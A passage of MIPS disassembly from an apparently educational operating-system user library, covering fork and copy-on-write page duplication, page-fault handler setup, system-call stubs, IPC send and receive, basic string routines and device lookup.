400f88: 3c060040 lui a2,0x40
400f8c: 0c100096 jal 400258 <_user_panic>
400f90: 24c673b0 addiu a2,a2,29616
400f94: 8fbf0020 lw ra,32(sp)
400f98: 8fb1001c lw s1,28(sp)
400f9c: 8fb00018 lw s0,24(sp)
400fa0: 03e00008 jr ra
400fa4: 27bd0028 addiu sp,sp,40
00400fa8 <fork>:
400fa8: 27bdffd0 addiu sp,sp,-48
400fac: afbf002c sw ra,44(sp)
400fb0: afb40028 sw s4,40(sp)
400fb4: afb30024 sw s3,36(sp)
400fb8: afb20020 sw s2,32(sp)
400fbc: afb1001c sw s1,28(sp)
400fc0: afb00018 sw s0,24(sp)
400fc4: 3c040040 lui a0,0x40
400fc8: 0c10050c jal 401430 <set_pgfault_handler>
400fcc: 24840d3c addiu a0,a0,3388
400fd0: afa00010 sw zero,16(sp)
400fd4: afa00014 sw zero,20(sp)
400fd8: 2404253f li a0,9535
400fdc: 00002821 move a1,zero
400fe0: 00003021 move a2,zero
400fe4: 0c100030 jal 4000c0 <msyscall>
400fe8: 00003821 move a3,zero
400fec: 14400011 bnez v0,401034 <fork+0x8c>
400ff0: 0040a021 move s4,v0
400ff4: 0c10053a jal 4014e8 <syscall_getenvid>
400ff8: 00000000 nop
400ffc: 304203ff andi v0,v0,0x3ff
401000: 00022080 sll a0,v0,0x2
401004: 00021940 sll v1,v0,0x5
401008: 00641823 subu v1,v1,a0
40100c: 00621821 addu v1,v1,v0
401010: 000318c0 sll v1,v1,0x3
401014: 3c020040 lui v0,0x40
401018: 8c426000 lw v0,24576(v0)
40101c: 00000000 nop
401020: 00621821 addu v1,v1,v0
401024: 3c020041 lui v0,0x41
401028: ac438004 sw v1,-32764(v0)
40102c: 1000003f b 40112c <fork+0x184>
401030: 00001021 move v0,zero
401034: 00008021 move s0,zero
401038: 3c120040 lui s2,0x40
40103c: 3c130040 lui s3,0x40
401040: 3c027f3f lui v0,0x7f3f
401044: 3451e000 ori s1,v0,0xe000
401048: 00101582 srl v0,s0,0x16
40104c: 8e43600c lw v1,24588(s2)
401050: 00021080 sll v0,v0,0x2
401054: 00431021 addu v0,v0,v1
401058: 8c420000 lw v0,0(v0)
40105c: 00000000 nop
401060: 30420200 andi v0,v0,0x200
401064: 1040000b beqz v0,401094 <fork+0xec>
401068: 00102b02 srl a1,s0,0xc
40106c: 8e626008 lw v0,24584(s3)
401070: 00051880 sll v1,a1,0x2
401074: 00621821 addu v1,v1,v0
401078: 8c620000 lw v0,0(v1)
40107c: 00000000 nop
401080: 30420200 andi v0,v0,0x200
401084: 10400003 beqz v0,401094 <fork+0xec>
401088: 00000000 nop
40108c: 0c100394 jal 400e50 <duppage>
401090: 02802021 move a0,s4
401094: 26101000 addiu s0,s0,4096
401098: 1611ffec bne s0,s1,40104c <fork+0xa4>
40109c: 00101582 srl v0,s0,0x16
4010a0: 02802021 move a0,s4
4010a4: 3c057f3f lui a1,0x7f3f
4010a8: 34a5f000 ori a1,a1,0xf000
4010ac: 0c100570 jal 4015c0 <syscall_mem_alloc>
4010b0: 24060600 li a2,1536
4010b4: 04410007 bgez v0,4010d4 <fork+0x12c>
4010b8: 02802021 move a0,s4
4010bc: 3c040040 lui a0,0x40
4010c0: 2484726c addiu a0,a0,29292
4010c4: 240500e0 li a1,224
4010c8: 3c060040 lui a2,0x40
4010cc: 0c100096 jal 400258 <_user_panic>
4010d0: 24c673dc addiu a2,a2,29660
4010d4: 3c050040 lui a1,0x40
4010d8: 24a50014 addiu a1,a1,20
4010dc: 0c100561 jal 401584 <syscall_set_pgfault_handler>
4010e0: 3c067f40 lui a2,0x7f40
4010e4: 04410007 bgez v0,401104 <fork+0x15c>
4010e8: 02802021 move a0,s4
4010ec: 3c040040 lui a0,0x40
4010f0: 2484726c addiu a0,a0,29292
4010f4: 240500e4 li a1,228
4010f8: 3c060040 lui a2,0x40
4010fc: 0c100096 jal 400258 <_user_panic>
401100: 24c673f4 addiu a2,a2,29684
401104: 0c10059f jal 40167c <syscall_set_env_status>
401108: 24050001 li a1,1
40110c: 04410007 bgez v0,40112c <fork+0x184>
401110: 02801021 move v0,s4
401114: 3c040040 lui a0,0x40
401118: 2484726c addiu a0,a0,29292
40111c: 240500e8 li a1,232
401120: 3c060040 lui a2,0x40
401124: 0c100096 jal 400258 <_user_panic>
401128: 24c67418 addiu a2,a2,29720
40112c: 8fbf002c lw ra,44(sp)
401130: 8fb40028 lw s4,40(sp)
401134: 8fb30024 lw s3,36(sp)
401138: 8fb20020 lw s2,32(sp)
40113c: 8fb1001c lw s1,28(sp)
401140: 8fb00018 lw s0,24(sp)
401144: 03e00008 jr ra
401148: 27bd0030 addiu sp,sp,48
0040114c <myduppage>:
40114c: 27bdffd0 addiu sp,sp,-48
401150: afbf0028 sw ra,40(sp)
401154: afb30024 sw s3,36(sp)
401158: afb20020 sw s2,32(sp)
40115c: afb1001c sw s1,28(sp)
401160: afb00018 sw s0,24(sp)
401164: 00809821 move s3,a0
401168: 00058880 sll s1,a1,0x2
40116c: 3c120040 lui s2,0x40
401170: 8e426008 lw v0,24584(s2)
401174: 00000000 nop
401178: 00511021 addu v0,v0,s1
40117c: 8c420000 lw v0,0(v0)
401180: 00000000 nop
401184: 30430fff andi v1,v0,0xfff
401188: 30420001 andi v0,v0,0x1
40118c: 10400013 beqz v0,4011dc <myduppage+0x90>
401190: 00058300 sll s0,a1,0xc
401194: 0c10034f jal 400d3c <pgfault>
401198: 02002021 move a0,s0
40119c: 8e426008 lw v0,24584(s2)
4011a0: 00000000 nop
4011a4: 02221021 addu v0,s1,v0
4011a8: 8c420000 lw v0,0(v0)
4011ac: 00000000 nop
4011b0: 30420fff andi v0,v0,0xfff
4011b4: afa20010 sw v0,16(sp)
4011b8: 00002021 move a0,zero
4011bc: 02002821 move a1,s0
4011c0: 02603021 move a2,s3
4011c4: 0c10057f jal 4015fc <syscall_mem_map>
4011c8: 02003821 move a3,s0
4011cc: 04410009 bgez v0,4011f4 <myduppage+0xa8>
4011d0: 00000000 nop
4011d4: 10000007 b 4011f4 <myduppage+0xa8>
4011d8: 00000000 nop
4011dc: afa30010 sw v1,16(sp)
4011e0: 00002021 move a0,zero
4011e4: 02002821 move a1,s0
4011e8: 02603021 move a2,s3
4011ec: 0c10057f jal 4015fc <syscall_mem_map>
4011f0: 02003821 move a3,s0
4011f4: 8fbf0028 lw ra,40(sp)
4011f8: 8fb30024 lw s3,36(sp)
4011fc: 8fb20020 lw s2,32(sp)
401200: 8fb1001c lw s1,28(sp)
401204: 8fb00018 lw s0,24(sp)
401208: 03e00008 jr ra
40120c: 27bd0030 addiu sp,sp,48
00401210 <tfork>:
401210: 27bdffc8 addiu sp,sp,-56
401214: afbf0030 sw ra,48(sp)
401218: afb5002c sw s5,44(sp)
40121c: afb40028 sw s4,40(sp)
401220: afb30024 sw s3,36(sp)
401224: afb20020 sw s2,32(sp)
401228: afb1001c sw s1,28(sp)
40122c: 0c100318 jal 400c60 <uget_sp>
401230: afb00018 sw s0,24(sp)
401234: 0040a821 move s5,v0
401238: 3c040040 lui a0,0x40
40123c: 0c10050c jal 401430 <set_pgfault_handler>
401240: 24840d3c addiu a0,a0,3388
401244: afa00010 sw zero,16(sp)
401248: afa00014 sw zero,20(sp)
40124c: 2404253f li a0,9535
401250: 00002821 move a1,zero
401254: 00003021 move a2,zero
401258: 0c100030 jal 4000c0 <msyscall>
40125c: 00003821 move a3,zero
401260: 14400011 bnez v0,4012a8 <tfork+0x98>
401264: 0040a021 move s4,v0
401268: 0c10053a jal 4014e8 <syscall_getenvid>
40126c: 00000000 nop
401270: 304203ff andi v0,v0,0x3ff
401274: 00022080 sll a0,v0,0x2
401278: 00021940 sll v1,v0,0x5
40127c: 00641823 subu v1,v1,a0
401280: 00621821 addu v1,v1,v0
401284: 000318c0 sll v1,v1,0x3
401288: 3c020040 lui v0,0x40
40128c: 8c426000 lw v0,24576(v0)
401290: 00000000 nop
401294: 00621821 addu v1,v1,v0
401298: 3c020041 lui v0,0x41
40129c: ac438004 sw v1,-32764(v0)
4012a0: 10000052 b 4013ec <tfork+0x1dc>
4012a4: 00001021 move v0,zero
4012a8: 00008021 move s0,zero
4012ac: 3c120040 lui s2,0x40
4012b0: 3c130040 lui s3,0x40
4012b4: 3c027f01 lui v0,0x7f01
4012b8: 34516000 ori s1,v0,0x6000
4012bc: 00101582 srl v0,s0,0x16
4012c0: 8e43600c lw v1,24588(s2)
4012c4: 00021080 sll v0,v0,0x2
4012c8: 00431021 addu v0,v0,v1
4012cc: 8c420000 lw v0,0(v0)
4012d0: 00000000 nop
4012d4: 30420200 andi v0,v0,0x200
4012d8: 1040000d beqz v0,401310 <tfork+0x100>
4012dc: 00102b02 srl a1,s0,0xc
4012e0: 8e626008 lw v0,24584(s3)
4012e4: 00051880 sll v1,a1,0x2
4012e8: 00621821 addu v1,v1,v0
4012ec: 8c620000 lw v0,0(v1)
4012f0: 00000000 nop
4012f4: 30420200 andi v0,v0,0x200
4012f8: 10400005 beqz v0,401310 <tfork+0x100>
4012fc: 00000000 nop
401300: 0c100453 jal 40114c <myduppage>
401304: 02802021 move a0,s4
401308: 04400038 bltz v0,4013ec <tfork+0x1dc>
40130c: 00001021 move v0,zero
401310: 26101000 addiu s0,s0,4096
401314: 1611ffea bne s0,s1,4012c0 <tfork+0xb0>
401318: 00101582 srl v0,s0,0x16
40131c: 3c02ffc1 lui v0,0xffc1
401320: 34428000 ori v0,v0,0x8000
401324: 02a28021 addu s0,s5,v0
401328: 3c027f3f lui v0,0x7f3f
40132c: 3442dfff ori v0,v0,0xdfff
401330: 0050102b sltu v0,v0,s0
401334: 1440001b bnez v0,4013a4 <tfork+0x194>
401338: 3c027f3f lui v0,0x7f3f
40133c: 3c110040 lui s1,0x40
401340: 3c120040 lui s2,0x40
401344: 3453dfff ori s3,v0,0xdfff
401348: 00101582 srl v0,s0,0x16
40134c: 8e23600c lw v1,24588(s1)
401350: 00021080 sll v0,v0,0x2
401354: 00431021 addu v0,v0,v1
401358: 8c420000 lw v0,0(v0)
40135c: 00000000 nop
401360: 30420200 andi v0,v0,0x200
401364: 1040000b beqz v0,401394 <tfork+0x184>
401368: 00102b02 srl a1,s0,0xc
40136c: 8e426008 lw v0,24584(s2)
401370: 00051880 sll v1,a1,0x2
401374: 00621821 addu v1,v1,v0
401378: 8c620000 lw v0,0(v1)
40137c: 00000000 nop
401380: 30420200 andi v0,v0,0x200
401384: 10400003 beqz v0,401394 <tfork+0x184>
401388: 00000000 nop
40138c: 0c100394 jal 400e50 <duppage>
401390: 02802021 move a0,s4
401394: 26101000 addiu s0,s0,4096
401398: 0270102b sltu v0,s3,s0
40139c: 1040ffeb beqz v0,40134c <tfork+0x13c>
4013a0: 00101582 srl v0,s0,0x16
4013a4: 02802021 move a0,s4
4013a8: 3c057f3f lui a1,0x7f3f
4013ac: 34a5f000 ori a1,a1,0xf000
4013b0: 0c100570 jal 4015c0 <syscall_mem_alloc>
4013b4: 24060600 li a2,1536
4013b8: 0440000c bltz v0,4013ec <tfork+0x1dc>
4013bc: 02802021 move a0,s4
4013c0: 3c050040 lui a1,0x40
4013c4: 24a50014 addiu a1,a1,20
4013c8: 0c100561 jal 401584 <syscall_set_pgfault_handler>
4013cc: 3c067f40 lui a2,0x7f40
4013d0: 04400006 bltz v0,4013ec <tfork+0x1dc>
4013d4: 02802021 move a0,s4
4013d8: 0c10059f jal 40167c <syscall_set_env_status>
4013dc: 24050001 li a1,1
4013e0: 04400002 bltz v0,4013ec <tfork+0x1dc>
4013e4: 00000000 nop
4013e8: 02801021 move v0,s4
4013ec: 8fbf0030 lw ra,48(sp)
4013f0: 8fb5002c lw s5,44(sp)
4013f4: 8fb40028 lw s4,40(sp)
4013f8: 8fb30024 lw s3,36(sp)
4013fc: 8fb20020 lw s2,32(sp)
401400: 8fb1001c lw s1,28(sp)
401404: 8fb00018 lw s0,24(sp)
401408: 03e00008 jr ra
40140c: 27bd0038 addiu sp,sp,56
00401410 <sfork>:
401410: 27bdffe8 addiu sp,sp,-24
401414: afbf0010 sw ra,16(sp)
401418: 3c040040 lui a0,0x40
40141c: 2484726c addiu a0,a0,29292
401420: 2405014c li a1,332
401424: 3c060040 lui a2,0x40
401428: 0c100096 jal 400258 <_user_panic>
40142c: 24c67430 addiu a2,a2,29744
00401430 <set_pgfault_handler>:
401430: 27bdffe8 addiu sp,sp,-24
401434: afbf0014 sw ra,20(sp)
401438: afb00010 sw s0,16(sp)
40143c: 3c020040 lui v0,0x40
401440: 8c426010 lw v0,24592(v0)
401444: 00000000 nop
401448: 14400013 bnez v0,401498 <set_pgfault_handler+0x68>
40144c: 00808021 move s0,a0
401450: 00002021 move a0,zero
401454: 3c057f3f lui a1,0x7f3f
401458: 34a5f000 ori a1,a1,0xf000
40145c: 0c100570 jal 4015c0 <syscall_mem_alloc>
401460: 24060600 li a2,1536
401464: 04400007 bltz v0,401484 <set_pgfault_handler+0x54>
401468: 3c050040 lui a1,0x40
40146c: 00002021 move a0,zero
401470: 24a50014 addiu a1,a1,20
401474: 0c100561 jal 401584 <syscall_set_pgfault_handler>
401478: 3c067f40 lui a2,0x7f40
40147c: 04410007 bgez v0,40149c <set_pgfault_handler+0x6c>
401480: 3c020040 lui v0,0x40
401484: 3c040040 lui a0,0x40
401488: 0c100086 jal 400218 <writef>
40148c: 24847448 addiu a0,a0,29768
401490: 10000003 b 4014a0 <set_pgfault_handler+0x70>
401494: 00000000 nop
401498: 3c020040 lui v0,0x40
40149c: ac506010 sw s0,24592(v0)
4014a0: 8fbf0014 lw ra,20(sp)
4014a4: 8fb00010 lw s0,16(sp)
4014a8: 03e00008 jr ra
4014ac: 27bd0018 addiu sp,sp,24
004014b0 <syscall_putchar>:
4014b0: 27bdffe0 addiu sp,sp,-32
4014b4: afbf0018 sw ra,24(sp)
4014b8: 00042e00 sll a1,a0,0x18
4014bc: 00052e03 sra a1,a1,0x18
4014c0: afa00010 sw zero,16(sp)
4014c4: afa00014 sw zero,20(sp)
4014c8: 24042537 li a0,9527
4014cc: 00003021 move a2,zero
4014d0: 0c100030 jal 4000c0 <msyscall>
4014d4: 00003821 move a3,zero
4014d8: 8fbf0018 lw ra,24(sp)
4014dc: 00000000 nop
4014e0: 03e00008 jr ra
4014e4: 27bd0020 addiu sp,sp,32
004014e8 <syscall_getenvid>:
4014e8: 27bdffe0 addiu sp,sp,-32
4014ec: afbf0018 sw ra,24(sp)
4014f0: afa00010 sw zero,16(sp)
4014f4: afa00014 sw zero,20(sp)
4014f8: 24042538 li a0,9528
4014fc: 00002821 move a1,zero
401500: 00003021 move a2,zero
401504: 0c100030 jal 4000c0 <msyscall>
401508: 00003821 move a3,zero
40150c: 8fbf0018 lw ra,24(sp)
401510: 00000000 nop
401514: 03e00008 jr ra
401518: 27bd0020 addiu sp,sp,32
0040151c <syscall_yield>:
40151c: 27bdffe0 addiu sp,sp,-32
401520: afbf0018 sw ra,24(sp)
401524: afa00010 sw zero,16(sp)
401528: afa00014 sw zero,20(sp)
40152c: 24042539 li a0,9529
401530: 00002821 move a1,zero
401534: 00003021 move a2,zero
401538: 0c100030 jal 4000c0 <msyscall>
40153c: 00003821 move a3,zero
401540: 8fbf0018 lw ra,24(sp)
401544: 00000000 nop
401548: 03e00008 jr ra
40154c: 27bd0020 addiu sp,sp,32
00401550 <syscall_env_destroy>:
401550: 27bdffe0 addiu sp,sp,-32
401554: afbf0018 sw ra,24(sp)
401558: 00802821 move a1,a0
40155c: afa00010 sw zero,16(sp)
401560: afa00014 sw zero,20(sp)
401564: 2404253a li a0,9530
401568: 00003021 move a2,zero
40156c: 0c100030 jal 4000c0 <msyscall>
401570: 00003821 move a3,zero
401574: 8fbf0018 lw ra,24(sp)
401578: 00000000 nop
40157c: 03e00008 jr ra
401580: 27bd0020 addiu sp,sp,32
00401584 <syscall_set_pgfault_handler>:
401584: 27bdffe0 addiu sp,sp,-32
401588: afbf0018 sw ra,24(sp)
40158c: 00801021 move v0,a0
401590: 00a01821 move v1,a1
401594: 00c03821 move a3,a2
401598: afa00010 sw zero,16(sp)
40159c: afa00014 sw zero,20(sp)
4015a0: 2404253b li a0,9531
4015a4: 00402821 move a1,v0
4015a8: 0c100030 jal 4000c0 <msyscall>
4015ac: 00603021 move a2,v1
4015b0: 8fbf0018 lw ra,24(sp)
4015b4: 00000000 nop
4015b8: 03e00008 jr ra
4015bc: 27bd0020 addiu sp,sp,32
004015c0 <syscall_mem_alloc>:
4015c0: 27bdffe0 addiu sp,sp,-32
4015c4: afbf0018 sw ra,24(sp)
4015c8: 00801021 move v0,a0
4015cc: 00a01821 move v1,a1
4015d0: 00c03821 move a3,a2
4015d4: afa00010 sw zero,16(sp)
4015d8: afa00014 sw zero,20(sp)
4015dc: 2404253c li a0,9532
4015e0: 00402821 move a1,v0
4015e4: 0c100030 jal 4000c0 <msyscall>
4015e8: 00603021 move a2,v1
4015ec: 8fbf0018 lw ra,24(sp)
4015f0: 00000000 nop
4015f4: 03e00008 jr ra
4015f8: 27bd0020 addiu sp,sp,32
004015fc <syscall_mem_map>:
4015fc: 27bdffe0 addiu sp,sp,-32
401600: afbf0018 sw ra,24(sp)
401604: 00801821 move v1,a0
401608: 00a04021 move t0,a1
40160c: 00c04821 move t1,a2
401610: afa70010 sw a3,16(sp)
401614: 8fa20030 lw v0,48(sp)
401618: 00000000 nop
40161c: afa20014 sw v0,20(sp)
401620: 2404253d li a0,9533
401624: 00602821 move a1,v1
401628: 01003021 move a2,t0
40162c: 0c100030 jal 4000c0 <msyscall>
401630: 01203821 move a3,t1
401634: 8fbf0018 lw ra,24(sp)
401638: 00000000 nop
40163c: 03e00008 jr ra
401640: 27bd0020 addiu sp,sp,32
00401644 <syscall_mem_unmap>:
401644: 27bdffe0 addiu sp,sp,-32
401648: afbf0018 sw ra,24(sp)
40164c: 00801021 move v0,a0
401650: 00a03021 move a2,a1
401654: afa00010 sw zero,16(sp)
401658: afa00014 sw zero,20(sp)
40165c: 2404253e li a0,9534
401660: 00402821 move a1,v0
401664: 0c100030 jal 4000c0 <msyscall>
401668: 00003821 move a3,zero
40166c: 8fbf0018 lw ra,24(sp)
401670: 00000000 nop
401674: 03e00008 jr ra
401678: 27bd0020 addiu sp,sp,32
0040167c <syscall_set_env_status>:
40167c: 27bdffe0 addiu sp,sp,-32
401680: afbf0018 sw ra,24(sp)
401684: 00801021 move v0,a0
401688: 00a03021 move a2,a1
40168c: afa00010 sw zero,16(sp)
401690: afa00014 sw zero,20(sp)
401694: 24042540 li a0,9536
401698: 00402821 move a1,v0
40169c: 0c100030 jal 4000c0 <msyscall>
4016a0: 00003821 move a3,zero
4016a4: 8fbf0018 lw ra,24(sp)
4016a8: 00000000 nop
4016ac: 03e00008 jr ra
4016b0: 27bd0020 addiu sp,sp,32
004016b4 <syscall_set_trapframe>:
4016b4: 27bdffe0 addiu sp,sp,-32
4016b8: afbf0018 sw ra,24(sp)
4016bc: 00801021 move v0,a0
4016c0: 00a03021 move a2,a1
4016c4: afa00010 sw zero,16(sp)
4016c8: afa00014 sw zero,20(sp)
4016cc: 24042541 li a0,9537
4016d0: 00402821 move a1,v0
4016d4: 0c100030 jal 4000c0 <msyscall>
4016d8: 00003821 move a3,zero
4016dc: 8fbf0018 lw ra,24(sp)
4016e0: 00000000 nop
4016e4: 03e00008 jr ra
4016e8: 27bd0020 addiu sp,sp,32
004016ec <syscall_panic>:
4016ec: 27bdffe0 addiu sp,sp,-32
4016f0: afbf0018 sw ra,24(sp)
4016f4: 00802821 move a1,a0
4016f8: afa00010 sw zero,16(sp)
4016fc: afa00014 sw zero,20(sp)
401700: 24042542 li a0,9538
401704: 00003021 move a2,zero
401708: 0c100030 jal 4000c0 <msyscall>
40170c: 00003821 move a3,zero
401710: 8fbf0018 lw ra,24(sp)
401714: 00000000 nop
401718: 03e00008 jr ra
40171c: 27bd0020 addiu sp,sp,32
00401720 <syscall_ipc_can_send>:
401720: 27bdffe0 addiu sp,sp,-32
401724: afbf0018 sw ra,24(sp)
401728: 00801021 move v0,a0
40172c: 00a01821 move v1,a1
401730: 00c04021 move t0,a2
401734: afa70010 sw a3,16(sp)
401738: afa00014 sw zero,20(sp)
40173c: 24042543 li a0,9539
401740: 00402821 move a1,v0
401744: 00603021 move a2,v1
401748: 0c100030 jal 4000c0 <msyscall>
40174c: 01003821 move a3,t0
401750: 8fbf0018 lw ra,24(sp)
401754: 00000000 nop
401758: 03e00008 jr ra
40175c: 27bd0020 addiu sp,sp,32
00401760 <syscall_ipc_recv>:
401760: 27bdffe0 addiu sp,sp,-32
401764: afbf0018 sw ra,24(sp)
401768: 00802821 move a1,a0
40176c: afa00010 sw zero,16(sp)
401770: afa00014 sw zero,20(sp)
401774: 24042544 li a0,9540
401778: 00003021 move a2,zero
40177c: 0c100030 jal 4000c0 <msyscall>
401780: 00003821 move a3,zero
401784: 8fbf0018 lw ra,24(sp)
401788: 00000000 nop
40178c: 03e00008 jr ra
401790: 27bd0020 addiu sp,sp,32
00401794 <syscall_cgetc>:
401794: 27bdffe0 addiu sp,sp,-32
401798: afbf0018 sw ra,24(sp)
40179c: afa00010 sw zero,16(sp)
4017a0: afa00014 sw zero,20(sp)
4017a4: 24042545 li a0,9541
4017a8: 00002821 move a1,zero
4017ac: 00003021 move a2,zero
4017b0: 0c100030 jal 4000c0 <msyscall>
4017b4: 00003821 move a3,zero
4017b8: 8fbf0018 lw ra,24(sp)
4017bc: 00000000 nop
4017c0: 03e00008 jr ra
4017c4: 27bd0020 addiu sp,sp,32
...
004017d0 <ipc_send>:
4017d0: 27bdffd8 addiu sp,sp,-40
4017d4: afbf0024 sw ra,36(sp)
4017d8: afb40020 sw s4,32(sp)
4017dc: afb3001c sw s3,28(sp)
4017e0: afb20018 sw s2,24(sp)
4017e4: afb10014 sw s1,20(sp)
4017e8: afb00010 sw s0,16(sp)
4017ec: 0080a021 move s4,a0
4017f0: 00a09821 move s3,a1
4017f4: 00c09021 move s2,a2
4017f8: 00e08821 move s1,a3
4017fc: 10000003 b 40180c <ipc_send+0x3c>
401800: 2410fffa li s0,-6
401804: 0c100547 jal 40151c <syscall_yield>
401808: 00000000 nop
40180c: 02802021 move a0,s4
401810: 02602821 move a1,s3
401814: 02403021 move a2,s2
401818: 0c1005c8 jal 401720 <syscall_ipc_can_send>
40181c: 02203821 move a3,s1
401820: 1050fff8 beq v0,s0,401804 <ipc_send+0x34>
401824: 00000000 nop
401828: 10400007 beqz v0,401848 <ipc_send+0x78>
40182c: 3c040040 lui a0,0x40
401830: 24847464 addiu a0,a0,29796
401834: 2405001c li a1,28
401838: 3c060040 lui a2,0x40
40183c: 24c6746c addiu a2,a2,29804
401840: 0c100096 jal 400258 <_user_panic>
401844: 00403821 move a3,v0
401848: 8fbf0024 lw ra,36(sp)
40184c: 8fb40020 lw s4,32(sp)
401850: 8fb3001c lw s3,28(sp)
401854: 8fb20018 lw s2,24(sp)
401858: 8fb10014 lw s1,20(sp)
40185c: 8fb00010 lw s0,16(sp)
401860: 03e00008 jr ra
401864: 27bd0028 addiu sp,sp,40
00401868 <ipc_recv>:
401868: 27bdffe0 addiu sp,sp,-32
40186c: afbf0018 sw ra,24(sp)
401870: afb10014 sw s1,20(sp)
401874: afb00010 sw s0,16(sp)
401878: 00808021 move s0,a0
40187c: 00c08821 move s1,a2
401880: 0c1005d8 jal 401760 <syscall_ipc_recv>
401884: 00a02021 move a0,a1
401888: 12000006 beqz s0,4018a4 <ipc_recv+0x3c>
40188c: 3c020041 lui v0,0x41
401890: 8c428004 lw v0,-32764(v0)
401894: 00000000 nop
401898: 8c4200c8 lw v0,200(v0)
40189c: 00000000 nop
4018a0: ae020000 sw v0,0(s0)
4018a4: 12200006 beqz s1,4018c0 <ipc_recv+0x58>
4018a8: 3c020041 lui v0,0x41
4018ac: 8c428004 lw v0,-32764(v0)
4018b0: 00000000 nop
4018b4: 8c4200d4 lw v0,212(v0)
4018b8: 00000000 nop
4018bc: ae220000 sw v0,0(s1)
4018c0: 3c020041 lui v0,0x41
4018c4: 8c428004 lw v0,-32764(v0)
4018c8: 00000000 nop
4018cc: 8c4200c4 lw v0,196(v0)
4018d0: 8fbf0018 lw ra,24(sp)
4018d4: 8fb10014 lw s1,20(sp)
4018d8: 8fb00010 lw s0,16(sp)
4018dc: 03e00008 jr ra
4018e0: 27bd0020 addiu sp,sp,32
...
004018f0 <strlen>:
4018f0: 80820000 lb v0,0(a0)
4018f4: 00000000 nop
4018f8: 10400006 beqz v0,401914 <strlen+0x24>
4018fc: 00001821 move v1,zero
401900: 24840001 addiu a0,a0,1
401904: 80820000 lb v0,0(a0)
401908: 00000000 nop
40190c: 1440fffc bnez v0,401900 <strlen+0x10>
401910: 24630001 addiu v1,v1,1
401914: 03e00008 jr ra
401918: 00601021 move v0,v1
0040191c <strcpy>:
40191c: 00801821 move v1,a0
401920: 80a20000 lb v0,0(a1)
401924: 00000000 nop
401928: a0620000 sb v0,0(v1)
40192c: 24630001 addiu v1,v1,1
401930: 1440fffb bnez v0,401920 <strcpy+0x4>
401934: 24a50001 addiu a1,a1,1
401938: 03e00008 jr ra
40193c: 00801021 move v0,a0
00401940 <strchr>:
401940: 00801021 move v0,a0
401944: 00052e00 sll a1,a1,0x18
401948: 80830000 lb v1,0(a0)
40194c: 00000000 nop
401950: 1460000c bnez v1,401984 <strchr+0x44>
401954: 00052e03 sra a1,a1,0x18
401958: 03e00008 jr ra
40195c: 00001021 move v0,zero
401960: 10a3000a beq a1,v1,40198c <strchr+0x4c>
401964: 00000000 nop
401968: 24420001 addiu v0,v0,1
40196c: 80430000 lb v1,0(v0)
401970: 00000000 nop
401974: 1460fffa bnez v1,401960 <strchr+0x20>
401978: 00000000 nop
40197c: 03e00008 jr ra
401980: 00001021 move v0,zero
401984: 14a3fff8 bne a1,v1,401968 <strchr+0x28>
401988: 00000000 nop
40198c: 03e00008 jr ra
401990: 00000000 nop
00401994 <memcpy>:
401994: 10c0000a beqz a2,4019c0 <memcpy+0x2c>
401998: 24c2ffff addiu v0,a2,-1
40199c: 00801821 move v1,a0
4019a0: 00821021 addu v0,a0,v0
4019a4: 24460001 addiu a2,v0,1
4019a8: 90a20000 lbu v0,0(a1)
4019ac: 00000000 nop
4019b0: a0620000 sb v0,0(v1)
4019b4: 24630001 addiu v1,v1,1
4019b8: 1466fffb bne v1,a2,4019a8 <memcpy+0x14>
4019bc: 24a50001 addiu a1,a1,1
4019c0: 03e00008 jr ra
4019c4: 00801021 move v0,a0
004019c8 <strcmp>:
4019c8: 80830000 lb v1,0(a0)
4019cc: 00000000 nop
4019d0: 1060000c beqz v1,401a04 <strcmp+0x3c>
4019d4: 00000000 nop
4019d8: 10000014 b 401a2c <strcmp+0x64>
4019dc: 00000000 nop
4019e0: 24840001 addiu a0,a0,1
4019e4: 80830000 lb v1,0(a0)
4019e8: 00000000 nop
4019ec: 10600005 beqz v1,401a04 <strcmp+0x3c>
4019f0: 24a50001 addiu a1,a1,1
4019f4: 80a20000 lb v0,0(a1)
4019f8: 00000000 nop
4019fc: 1043fff8 beq v0,v1,4019e0 <strcmp+0x18>
401a00: 00000000 nop
401a04: 306300ff andi v1,v1,0xff
401a08: 90a50000 lbu a1,0(a1)
401a0c: 00000000 nop
401a10: 0065102b sltu v0,v1,a1
401a14: 10400003 beqz v0,401a24 <strcmp+0x5c>
401a18: 00000000 nop
401a1c: 03e00008 jr ra
401a20: 2402ffff li v0,-1
401a24: 03e00008 jr ra
401a28: 00a3102b sltu v0,a1,v1
401a2c: 80a20000 lb v0,0(a1)
401a30: 00000000 nop
401a34: 1443fff4 bne v0,v1,401a08 <strcmp+0x40>
401a38: 306300ff andi v1,v1,0xff
401a3c: 1000ffe9 b 4019e4 <strcmp+0x1c>
401a40: 24840001 addiu a0,a0,1
...
00401a50 <dev_lookup>:
401a50: 27bdffe8 addiu sp,sp,-24
401a54: afbf0010 sw ra,16(sp)
401a58: 00803021 move a2,a0
401a5c: 3c020040 lui v0,0x40
401a60: 8c447610 lw a0,30224(v0)
401a64: 00000000 nop
401a68: 14800017 bnez a0,401ac8 <dev_lookup+0x78>
401a6c: 3c020041 lui v0,0x41
401a70: 1000000e b 401aac <dev_lookup+0x5c>
401a74: 00000000 nop
401a78: 8c820000 lw v0,0(a0)
401a7c: 00000000 nop
401a80: 14c20006 bne a2,v0,401a9c <dev_lookup+0x4c>
401a84: 24630004 addiu v1,v1,4
401a88: aca40000 sw a0,0(a1)
401a8c: 10000014 b 401ae0 <dev_lookup+0x90>
401a90: 00001021 move v0,zero
401a94: 3c020040 lui v0,0x40
401a98: 24437614 addiu v1,v0,30228
401a9c: 8c640000 lw a0,0(v1)
401aa0: 00000000 nop
401aa4: 1480fff4 bnez a0,401a78 <dev_lookup+0x28>
401aa8: 3c020041 lui v0,0x41
401aac: 8c428004 lw v0,-32764(v0)
401ab0: 3c040040 lui a0,0x40
401ab4: 8c4500a4 lw a1,164(v0)
401ab8: 0c100086 jal 400218 <writef>
401abc: 24847484 addiu a0,a0,29828
401ac0: 10000007 b 401ae0 <dev_lookup+0x90>
401ac4: 2402fffd li v0,-3
401ac8: 8c820000 lw v0,0(a0)
401acc: 00000000 nop
401ad0: 14c2fff0 bne a2,v0,401a94 <dev_lookup+0x44>
401ad4: 00000000 nop
401ad8: 1000ffec b 401a8c <dev_lookup+0x3c>
401adc: aca40000 sw a0,0(a1)
401ae0: 8fbf0010 lw ra,16(sp)
401ae4: 00000000 nop
401ae8: 03e00008 jr ra
401aec: 27bd0018 addiu sp,sp,24
00401af0 <fd_alloc>:
401af0: 3c020040 lui v0,0x40
401af4: 8c46600c lw a2,24588(v0)
401af8: 3c055fc0 lui a1,0x5fc0
